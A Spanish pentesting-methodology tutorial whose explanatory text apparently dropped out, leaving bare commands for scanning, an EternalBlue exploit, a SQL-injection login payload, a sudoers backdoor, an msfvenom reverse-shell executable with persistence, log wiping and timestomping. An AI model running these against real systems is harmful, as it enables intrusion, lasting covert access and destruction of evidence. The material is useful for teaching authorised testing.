Las metodologías de pentesting proporcionan un marco estructurado para realizar pruebas de penetración de manera sistemática y efectiva. Estas metodologías aseguran que se cubran todas las áreas críticas y que las pruebas sean reproducibles y consistentes. A continuación, se detallan las fases principales de una prueba de penetración, junto con ejemplos prácticos y recursos útiles.
# Alcance de la Prueba de Penetración **Objetivos:** * Identificar vulnerabilidades en la red interna. * Evaluar la seguridad de la aplicación web principal. **Sistemas Incluidos:** * Servidores: 192.168.1.10, 192.168.1.20 * Aplicación Web: https://app.ejemplo.com **Exclusiones:** * Sistemas de desarrollo y prueba.
import requests from bs4 import BeautifulSoup url = 'https://www.ejemplo.com' response = requests.get(url) soup = BeautifulSoup(response.text, 'html.parser') for enlace in soup.find_all('a'): print(enlace.get('href'))
nmap -sS -p 1-65535 -T4 192.168.1.10
nmap -A 192.168.1.10
nmap -sV --script=banner,ftp-anon,ssl-cert 192.168.1.10
msfconsole use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.1.10 exploit
import requests url = 'https://www.ejemplo.com/login' payload = {"username": "admin' OR '1'='1", "password": "password"} response = requests.post(url, data=payload) if "Bienvenido" in response.text: print("Vulnerable a SQL Injection")
sudo para Escalada de Privilegios:sudo -l
echo 'username ALL=(ALL) NOPASSWD:ALL' | sudo tee /etc/sudoers.d/username sudo su -
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe > backdoor.exe
meterpreter > run persistence -X -i 10 -p 4444 -r 192.168.1.5
echo "" > /var/log/auth.log echo "" > /var/log/syslog
touch -t 202307151230.30 archivo_modificado
# Reporte de Pruebas de Penetración ## Resumen Ejecutivo Breve resumen de los hallazgos y recomendaciones. ## Detalles de la Prueba * **Fecha de Prueba:** DD/MM/AAAA * **Sistemas Evaluados:** Detalle de los sistemas evaluados. ## Hallazgos ### Vulnerabilidad 1: Descripción * **Impacto:** Alto/Medio/Bajo * **Recomendaciones:** Pasos para mitigar. ### Vulnerabilidad 2: Descripción * **Impacto:** Alto/Medio/Bajo * **Recomendaciones:** Pasos para mitigar.
Las metodologías de pentesting proporcionan un marco estructurado para realizar pruebas de penetración de manera sistemática y efectiva. A través de las fases de planificación, recolección de información, escaneo, explotación, escalada de privilegios, mantenimiento de acceso, cobertura de huellas y reporte, los profesionales de la seguridad pueden identificar y mitigar vulnerabilidades en los sistemas y redes. Los recursos proporcionados ofrecen guías detalladas para profundizar en cada uno de estos aspectos y mejorar tus habilidades en pentesting.